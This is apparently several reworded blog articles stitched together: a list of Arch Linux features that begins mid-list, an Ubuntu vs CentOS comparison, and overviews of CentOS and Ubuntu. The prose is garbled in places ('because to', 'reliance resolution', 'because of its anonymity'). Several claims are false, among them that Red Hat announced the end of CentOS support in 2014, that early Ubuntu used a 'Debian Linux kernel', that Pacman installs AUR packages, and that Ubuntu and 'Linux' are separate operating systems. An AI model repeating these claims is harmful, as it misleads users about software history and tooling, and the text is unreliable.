The Arch Linux User Repository aka AUR is a community driven repository of user contributed packages for the Arch Linux operating system.

Users may quickly install and manage a wide range of software on their PCs because to the huge number of software packages accessible in the AUR that are not included in the official Arch Linux repositories.

The AUR, which gives users access to a sizable software repository that is regularly updated and managed by the community, is a unique characteristic of Arch Linux. It is a proof to the thriving and dedicated community of Arch Linux users who are committed to the operating system and prepared to give of their time and knowledge to help it grow.

In general, Arch Linux users can benefit extremely from the Arch Linux User Repository. Users may quickly install and manage a wide spectrum of software on their systems because to the large repository of software packages it offers that do not exist in the official Arch Linux repositories. The very existence of the AUR provides proof of the active and committed community of Arch Linux users who are enthusiastic about the software and are prepared to put in the time and effort necessary to improve it.

3-The Arch Linux wiki

Anyone using or planning on using Arch Linux should definitely check out the Arch wiki. The wiki is a rich and regularly updated source of knowledge on every aspect of Arch Linux, from setup and configuration to optimization and troubleshooting.

The Arch Linux community manages the wiki, therefore it is a group effort that is always developing and getting stronger. The wiki is a goldmine of knowledge on anything from using Arch Linux basically to doing complex system administration tasks.

The Arch Linux wiki is a really helpful resource for anyone using or passionate about Arch Linux, in general. For Arch Linux users across the world, it is an important source of knowledge and inspiration due to its focus on simplicity, accuracy, and involvement in the community.

4-Independent Distribution

Arch Linux is an independent Linux distribution that is supported by a strong user community and a small but passionate group of developers. As an autonomous distribution, Arch Linux is free to prioritize the needs and preferences of its users first because it is not restricted by any specific commercial sponsor or agenda.

Because of its anonymity, Arch Linux is very adaptable and capable of changing to meet the needs of its users. Arch Linux, as opposed to some other Linux distributions, can be installed on almost any machine and is ready to be adjusted to each user’s unique needs and preferences. Some other Linux distributions may be reliant upon particular hardware or software platforms.

5-Packman

On an Arch Linux system, Pacman offers an easy and user friendly command line interface for managing software packages. Users can use Pacman to find and install packages from third party repositories like the Arch Linux User Repository (AUR) and other unofficial repositories as well as from the official Arch Linux repositories.

Pacman’s powerful reliance resolution method is just one advantage. Dependencies between packages are immediately resolved by Pacman, ensuring that all required packages are installed and configured properly. As a result, users no longer have to worry about manual resolving dependencies and issues while installing and managing complicated software packages and libraries.

6-Simple Installation

The straightforward installation process of Arch Linux is one of its unique features. Arch Linux gives users a base system that they can customize and build over from scratch, as opposed to other Linux distributions that offer a graphical installer and a preconfigured desktop environment.

At first, users who are used to more efficient installation procedures could find this basic approach scary. However, it is this very simplicity that gives Arch Linux its incredible power and flexibility. Users can design a highly efficient and personalized system that suits their unique needs and preferences by starting with an elementary structure and building it up from there.

7-Open Source

All of the software packages that come with the distribution are free and open source since Arch Linux has been dedicated to the values of open source software. This dedication to open source covers the whole Arch Linux ecosystem, including the Arch User Repository (AUR) and the Arch Linux wiki, in addition to the software packages itself.

There are many reasons why open source software is essential. Most importantly, it supports transparency and accountability by ensuring that users have access to the source code and may check it for bugs, security flaws, and other problems. This creates a sense of community ownership and responsibility and encourages trust and confidence in the project as a whole.

8-Customization:

One of the unique features of Arch Linux is its flexibility and customizability. Arch Linux is extremely responsive and can be modified to match the unique needs and tastes of individual users because it is designed to be lightweight and minimalist with a focus on efficiency and ease of use.

The package management system of Arch Linux, which is based on the Pacman package manager, enables this customizability. Users can install, update, and remove software packages using the straightforward and user friendly interface of Pacman, a command line based package manager.

In general, Arch Linux’s success and popularity are greatly influenced by its capacity for adaptation and customizability. Arch Linux gives fans the ability to design incredibly customized productive computing environments by giving them a lightweight, minimal system that is easily customizable.

Conclusion

Arch Linux is a popular operating system that is known for its adaptability, customization, and simplicity. Because of its rolling release model, users always have access to the most recent software updates and features. While Arch Linux is not the most user friendly option, its dedicated user community offers a wealth of resources and support to those willing to put in the effort to learn the system. Overall, Arch Linux is an excellent choice for advanced Linux users who prioritize freedom of choice over simplicity and simplicity of use.

Are you new to Linux and don’t know which distribution to use? Or are you an advanced Linux user thinking about switching to a new distribution? Making a decision can be difficult with so many options accessible. In this piece, we’ll look in depth at two popular distributions, Ubuntu and CentOS, to help you make an informed decision. Ubuntu and CentOS both have large user bases and are extensively used in the industry. We’ll look at the main distinctions between Ubuntu and CentOS.

What Is Ubuntu?

Based on the Linux kernel, Ubuntu is an open-source and free operating system. Since its initial release in 2004, it has grown to be one of the a very well Linux distributions. A Southern African ideology that highlights the importance of community and sharing is where the word “ubuntu” originates. It embodies the cooperative, friendly, and supportive principles that form the basis of the Ubuntu operating system.

The intuitive user interface of Ubuntu is one of its standout qualities. Ubuntu is made to be simple to use for anyone, regardless of technical experience, in contrast to certain other Linux distributions that demand a certain level of technical understanding.

For the majority of users, it is an all in one solution because it comes with a variety of pre-installed applications like a web browser, office suite, media player, and more.

Ubuntu’s focus on security is another benefit. The operating system has a reputation for having robust security protections and is frequently updated to address flaws and shield users from potential attacks. Ubuntu also comes with encryption tools and a built-in firewall to protect user data.

Furthermore, a large developer community that produces software and applications for simple installation through the Ubuntu Software Center makes Ubuntu extremely customizable. The operating system is also made to work with a variety of hardware and may be used with both desktop and mobile devices

What is CentOS ?

CentOS was created by deriving its source code from Red Hat Enterprise Linux (RHEL). In corporate settings, data centers, and web servers, it is a well liked and reliable operating system. As a free and open source substitute for RHEL, CentOS is intended to give the same level of dependability and security with community assistance as opposed to the professional support offered by Red Hat. The operating system is ideal for users that need a safe and reliable environment to execute mission critical systems such as server applications and web services.

Via the YUM package manager, CentOS offers a large selection of software packages that may be installed, and it supports a number of architectures, including x86 64, ARM, and PPC. Major releases of CentOS are supported for up to ten years, and it has a long running release cycle.

Fore those who want a trustworthy and safe operating system for their servers without incurring the additional costs of commercial operating systems frequently choose for CentOS. It is a project that is driven by the community and is looked after by a group of volunteers that collaborate to keep the software current, safe, and dependable.

For users who want to utilize the same software stack as RHEL but don’t want to pay for the commercial support, CentOS is a great option because it is built to be compatible with the RHEL software ecosystem. CentOS also has a sizable and vibrant developer, user, and administrator community that actively participates in the development of the operating system by submitting bug reports, changes, and new features.

What’s the Biggest Difference Between CentOS vs. Ubuntu?

Ubuntu and CentOS are both popular Linux based operating systems for server and desktop environments. Here are a few key distinctions between the two:

Origin and Development :

CentOS is based on the Red Hat Enterprise Linux (RHEL) source code, whereas Ubuntu is based on the Debian Linux distribution. As a result, CentOS is intended to be a stable, secure, and reliable operating system compatible with RHEL, whereas Ubuntu is more focused on usability and flexibility.

Release Cycle:

CentOS has a longer release cycle than Ubuntu, with major releases typically supported for up to ten years. In comparison, Ubuntu typically has a shorter release cycle, with standard releases released every six months and long term support releases supported for five years.

Package Management:

To install, update, and remove software packages, CentOS uses the YUM package manager, whereas Ubuntu uses the APT package manager. While the functionality of both package managers is similar, their syntax and commands differ, so users might have to adjust to the various package management system when switching between the two.

Desktop environments:

Ubuntu provides several desktop environments, including the default GNOME desktop, KDE, XFCE, and LXDE, whereas CentOS is primarily a server operating system and does not include a default desktop environment. Users can, however, install their preferred desktop environment using the suitable package manager.

User Base:

New users and desktop users prefer Ubuntu, whereas enterprise users, data centers, and web servers prefer CentOS.

Both Ubuntu and CentOS are excellent operating systems, but they relate to various audiences. Ubuntu is more focused on usability and flexibility, whereas CentOS is intended to be a stable and reliable platform for enterprise users. Finally, the choice between Ubuntu and CentOS is determined by the user’s specific needs and requirements.

Conclusion

Ubuntu is popular among desktop users and small businesses due to its ease of use, user friendly interface, and flexibility. It also provides long term support releases, making it an excellent choice for those who require long term stability.

CentOS, on the other hand, is intended to be a stable, secure, and dependable platform for business users, data centers, and web servers. It is based on the Red Hat Enterprise Linux (RHEL) source code and provides a free and open source alternate solution to RHEL. CentOS has a longer release cycle and up to ten years of support, making it an excellent choice for purpose server environments.

When deciding between Ubuntu and CentOS, it is critical to consider the user’s specific needs and requirements. If simplicity and adaptability are important, Ubuntu is an excellent choice. If stability and dependability are critical, CentOS is the way to go. Both operating systems have advantages and disadvantages, so it is critical to weigh the pros and cons and select the one that best meets your needs. Finally, for those looking for a dependable and secure operating system, both Ubuntu and CentOS are excellent choices

CentOS is a Linux operating system that is built on the original source code of Red Hat Enterprise.

It is an open source, free operating system that is extensively used in server and web hosting environments. It provides a stable and secure platform on which to operate a variety of applications and services, such as web servers, database servers, and email servers. It is common among system administrators and developers due to its dependability, security, and ease of maintenance. CentOS also includes a large software package and tool repository, making it simple to install and administer software on the system. Because of its long term support and predictable release cycle, it is a reliable option for enterprise level deployments.

CentOS is intended to be a reliable and safe operating system for servers, workstations, and personal computers. It’s popular in the business sector because it offers a stable platform for hosting web applications, databases, and other mission critical services. It has a reputation for its long term support and dependable performance, making it an excellent option for organizations that place a high value on stability and security. It also has a large user and developer community that supports its growth and provides assistance via online forums and documentation. CentOS is offered in a variety of architectures, including x86, ARM, and PowerPC. Overall, It is a famous and stable operating system that can be used for a variety of purposes.

History of CentOS

CentOS was created in 2002 as a free alternative to Red Hat business Linux (RHEL), the dominant business Linux distribution at the time. It was founded by a group of volunteers who saw the need for a stable, dependable, and community driven operating system that companies and organizations could use without the need for expensive licenses or support contracts.

CentOS 2.0, the first version, was published in May 2004 and was based on the source code of RHEL 2.1AS. Since then, several major versions have been published, each based on the matching RHEL release.

The development team works carefully to ensure that the CentOS distribution is compatible with RHEL, which means that software packages intended for RHEL will run on CentOS without modification, and vice versa.

long term support (LTS) strategy is one of its strengths. CentOS major releases are supported for ten years from the date of release, ensuring that businesses can depend on It for a reliable and safe operating system in the long run. This is especially essential for companies that rely on a stable platform for critical applications.
Red Hat stated in 2014 that it would discontinue support for CentOS, causing concern among CentOS users.

Red Hat announced in December 2020 that it was moving its focus to It Stream and would discontinue support for CentOS Linux 8 at the end of 2021, a decade earlier than previously planned. The CentOS user community, which depended on It for stable, long term support, was outraged by this decision. The CentOS community, on the other hand, has pledged to continue development of CentOS Linux as a community driven project without Red Hat’s support.

Features of CentOS

Stability:

One of the main reasons for CentOS’s popularity is its stability. It is intended to be a long term support release that gives users a stable and dependable platform on which to run their apps. Because It has a slow release cycle, updates are fully tested before they are published. This means that users can rely on It for crucial applications without fear of unexpected crashes or downtime.

Security:

Security is another important aspect of CentOS. developers are dedicated to delivering a secure operating system that can resist a variety of security threats. CentOS has a strong security strategy that includes security updates on a regular basis, firewalls, and secure configuration defaults.

It additionally supports SELinux, which improves system security by having mandatory access controls.

Compatibility:

CentOS is compatible with a broad variety of hardware and software settings. It supports several platforms, including x86, x86_64, ARM, and PowerPC. It is also compatible with a wide range of common applications, including Apache, MySQL, PHP, and many more. As a result, it is an excellent option for developers looking for a dependable and compatible platform for their applications.

Speed:

CentOS is known for its high speed. It has a simple design which highlights economy and speed. It runs smoothly on a wide variety of hardware configurations because it uses the most recent stable kernel releases and optimized libraries

It also has a small memory footprint, making it appropriate for use on low resource systems.

Community Support:

CentOS has a big and active community that offers users help and support. The community offers documentation, guides, and forums where users can seek assistance and discuss their CentOS experiences. This makes troubleshooting any issues that users may face while using It easier.

Customization:

CentOS is highly customizable, allowing users to tailor the system to their particular requirements. It includes a number of tools and utilities that enable users to customize various elements of the system, including the desktop environment, networking, and security settings. As a result, it is an excellent option for users who require a flexible and customizable operating system.

Package Management

It utilizes the YUM package management system, which enables users to quickly install, update, and remove software packages. YUM gives users access to a massive repository of packages, making it simple to discover and install the software they require. It also supports dependencies, which guarantees that when a new software package is installed, all required packages are installed.

Virtualization:

CentOS supports a variety of virtualization platforms, including KVM, Xen, and VirtualBox.

Users can run multiple operating systems on a single physical machine, making it an excellent option for virtualized environments.

Cloud Support:

Because of its stability, security, and compatibility, CentOS is widely utilized in cloud computing environments. Many popular cloud platforms, including Amazon Web Services, Google Cloud Platform, and Microsoft Azure, support it. Furthermore, It includes tools and utilities that make it simple for users to handle and deploy cloud instances.

Open Source:

CentOS is free and open source software, which means that users can use, change, and distribute it without restriction. This makes it an excellent option for users who require a dependable and inexpensive operating system for personal or business use.

Conclusion

Finally, CentOS Linux is a dependable and stable operating system that is widely used in both personal and professional environments. It’s known for its security features, long term support, and compatibility with numerous software applications. The most recent CentOS Linux release offers users a modern and user friendly interface, as well as a number of powerful tools and utilities to boost productivity and streamline workflows. Despite the availability of other Linux distributions, CentOS Linux continues to be a popular choice among users due to its open source nature, adaptability, and solidity. Generally speaking, CentOS Linux is a valuable and affordable option for those seeking a powerful and stable operating system.

Ubuntu is a famous open source operating system that is based on the Linux kernel. It was founded with the intention of making computing more accessible, user friendly, and free for everybody. The name Ubuntu is derived from a South African ideology of community and kindness that highlights people’s connectivity and duty to one another.

One of Ubuntu’s primary features is its user friendly interface, which makes it simple to use for people of different ability levels. It also includes a variety of preinstalled software, such as browser, office productivity suite, music player, and others. The software center in Ubuntu makes it simple to locate and install extra programs, including many open source apps.

Ubuntu is recognized for its strong dedication to security and privacy. Ubuntu is built to be virus and malware resistant, and it offers a number of tools to help keep your system secure. It also protects your privacy by giving you control over what information is collected and shared.

Ubuntu is not only simple to use and secure, but it is also flexible. Users can select from a variety of desktop environments and themes, and there are multiple customization options to make the system look and feel exactly how they want it.

I believe that Ubuntu a popular free and open source Linux based operating system. Ubuntu is meant to be user friendly and may be worked on any number of platforms including desktops, laptops, servers, and even some smartphones. It is well known for its user friendly interface and already comes with a variety of software, including a web browser, office suite, media player, and many others. Ubuntu is also widely used for programming, software development, and other technical reasons, and it has a strong developer community that supports its development and provides user support.

What is the History of Ubuntu?

Mark Shuttleworth, a South African entrepreneur who had previously made a fortune by selling his company, developed Ubuntu in 2004. He had long been interested in open source software and saw a chance to create a Linux based operating system that was accessible and simple to use for everyone.

The term Ubuntu is derived from the South African ideology of Ubuntu, which shows people’s interdependence and duty to one another. He chose the name to symbolize the company’s commitment to open source software and community involvement.

In October 2004, the first version of Ubuntu, 4.10, was launched. It was based on the Debian Linux kernel and came with the GNOME desktop environment and lots of pre installed apps. Ubuntu immediately established a reputation for being user friendly and accessible, and it was especially popular among Linux newcomers.

Ubuntu has continued to grow and improve over time. New features include the Unity desktop environment, the Ubuntu Software Center, and the Ubuntu One cloud storage service. With the release of the Ubuntu Touch and Ubuntu Core platforms, it additionally widened its focus to include mobile and IoT devices.

Ubuntu vs Linux

One of the biggest differences between Ubuntu and Linux is that Ubuntu is a more easy to use operating system that is designed to be simple to use, especially for individuals who are unfamiliar with Linux. It has a graphical user interface similar to other popular operating systems such as Windows and macOS.

As a result, Linux is frequently seen as a highly technical operating system, primarily utilized by developers, system administrators, and other IT experts. Linux distributions such as Arch Linux or Gentoo Linux sometimes require more technical expertise and experience to install and configure.

One more difference between Ubuntu and Linux is the applications supplied. Ubuntu includes a variety of software preinstalled, including LibreOffice, the Firefox web browser, and the Thunderbird email client, among others. These applications have been designed to meet the majority of a typical user’s basic requirements.

In contrast, Linux often requires users to manually install and configure the software they needed. This takes more effort, but it gives you more flexibility and control over the system.

In terms of supporting and community, both Ubuntu and Linux have active and passionate user and developer communities. However, Ubuntu offers a more concentrated and organized support structure, which may make it easier for users to seek assistance when needed.

In the end, Ubuntu is a Linux based operating system that is meant to be user friendly and simple to use, but Linux as a whole is a more technical operating system that is frequently utilized by developers and IT experts. Ubuntu comes with a large choice of preinstalled software and a more structured support form, whereas Linux distributions often demand more manual configuration and customization but provide greater system control.

Why Ubuntu is so popular ?

Ubuntu is a member of the most popular and frequently used Linux distributions in the world for a variety of reasons. To begin with, Ubuntu is open source, which means that its source code is freely available to anyone who wishes to use it or contribute to its development. This has resulted in an active community of developers and users who have generated hundreds of software packages that can be quickly installed and updated using Ubuntu’s embedded package manager.

Another factor that influences Ubuntu’s popularity is its ease of use. The distribution includes a user friendly desktop environment that is easy to use, making it suitable for users of all skill levels. Furthermore, Ubuntu has a huge and active user community that provides aid.

One of the main reasons for Ubuntu’s popularity is its dedication to user privacy and data protection. Unlike many commercial operating systems, Ubuntu does not gather or display targeted advertising to users. As a result, it has become a popular option for individuals and companies who value privacy and data ownership.

Furthermore, the open source nature of Ubuntu has resulted in a huge and active developer community that contributes to the development of the operating system and its staying software packages. This has resulted in a wealth of free and open source software that can be simply installed and used on Ubuntu, giving users access to a wide set of tools and apps.

Another feature that makes up Ubuntu’s attract is its support for any number of hardware platforms. Ubuntu is built to function smoothly across a variety of devices, whether you’re using a desktop computer, laptop, or server, making it an ideal choice for users across a variety of sectors and professions.
In general, the success of Ubuntu may be given to a number of factors, including its open source nature, ease of use, security measures, compatibility with hardware and software, and dedication to user privacy and accessibility. These characteristics have made it popular among users all over the world, from individuals and small enterprises to huge corporations and government agencies.

5 Reasons why you Should Use Ubuntu:

1-Security

Ubuntu’s regular updates and fixes are one way it guarantees security. These updates are distributed on a regular basis and contain solutions for any known security vulnerabilities, assuring the system’s security and protection against potential attacks.

Ubuntu also comes with a number of security measures meant to protect against both external and internal threats. Ubuntu, for example, provides a firewall that may be configured to restrict incoming traffic from unknown sources, as well as tools for encryption and network security.

The user account management mechanism in Ubuntu is another essential component of its security. Ubuntu needs secure passwords and provides a number of tools for managing user accounts and permissions. This helps to ensure that sensitive data and system resources are only accessible to authorized users.

Finally, because Ubuntu is open source, users and developers can analyze the system’s code and highlight any potential security concerns. This contributes to the rapid identification and correction of vulnerabilities, making Ubuntu one of the most safe operating systems available today.

2-Customizability

One of the primary elements that separated Ubuntu from other operating systems is its ability to be customized. Ubuntu gives users lots of options for customizing their system to their specific needs and preferences. Users can customize the look and feel of their desktop environment, adjust system settings, and install software tailored to their unique requirements. Users have complete control over their computer environment with Ubuntu, making it an excellent choice for both amateur and professional users.

Furthermore to its customizability, Ubuntu provides an excellent support network ready to assist customers with any problems they may have. The Ubuntu support community is made up of experienced users and developers who are enthusiastic about the operating system and wish to assist others in making the most of it. Users can interact with other Ubuntu users through forums, wikis, and chat rooms, where they can ask questions, get advice, and share their experiences.

3-Ubuntu Community

The Ubuntu community is well known for its friendliness, and users can expect prompt and accurate responses to their questions. Whether it’s a simple question about how to install software or a sophisticated technical issue, users can turn to the Ubuntu support community for assistance in resolving their issues.

Overall, Ubuntu is a fantastic choice for users looking for a flexible and dependable operating system due to its customizability and large support community. Whether you are a beginner or a professional developer, Ubuntu gives you the tools and resources you need to build a computer environment that meets your individual requirements.

4-User Interface

The user interface of Ubuntu is one of its most popular aspects. The user interface, commonly known as the desktop environment, is the graphical interface with which users interact when operating systems are used. GNOME, Unity, KDE, and Xfce are among the user interface alternatives available in Ubuntu. Each interface has its own distinct set of features and design, allowing users to tailor their experience to their preferences.

The GNOME user interface is Ubuntu’s default and is noted for its simplicity and elegance. The interface is modern in appearance and feel, with a dock on the left side of the screen for rapid access to frequently used applications.

Unity is another famous Ubuntu user interface that was debuted in 2010. Unity has a sidebar that allows you to quickly access applications, files, and preferences. The UI also has a search function, which helps users to rapidly locate files and apps. Unity has received accolades for its elegant design and ease of use.

KDE is another Ubuntu user interface alternative that offers a more traditional desktop environment. KDE is well known for its customisable interface, which includes a wide range of themes, icons, and widgets. The interface also includes a task manager, which allows users to switch between open programs rapidly.

5-System Requirements

Ubuntu’s system requirements different based on the version and purpose of the operating system. There are, however, some minimal conditions that must be completed in order to assure a smooth and accurate functioning.

The recommended system requirements for desktop use in Ubuntu 20.04 LTS are at least a 2 GHz dual core processor or greater, 4 GB of RAM, and a minimum of 25 GB of hard disk space. A 2 GHz or faster processor, 2 GB of RAM, and at least 25 GB of hard disk space are the minimum requirements for a functioning machine. These specifications will enable the system to run most applications and execute most functions without difficulty.

Regarding servers usage, Ubuntu 20.04 LTS requires at least a 2 GHz quad core processor or greater, 4 GB of RAM, and a minimum of 25 GB of hard disk space. A 1 GHz processor, 512 MB of RAM, and at least 1 GB of hard drive space are the minimum requirements for a functioning server.

It should be noted that these are only the minimal system requirements; users may require higher specifications to operate more demanding programs or undertake strenuous tasks. Running virtual machines or complicated software development environments, for example, may necessitate additional RAM and CPU power.

Conclusion

Ubuntu is a massively popular and user-friendly operating system that provides users with a stable and reliable platform to work on. It is based on the Debian Linux distribution and is known for its simplicity, adaptability, and security. Ubuntu is simple to install and includes a large number of pre-installed applications, making it an excellent choice for home users, students, and businesses. It’s also a popular choice for developers, system administrators, and enthusiasts who need a powerful and customizable operating system. The open-source nature of Ubuntu allows users to modify and personalize the operating system to meet their specific needs.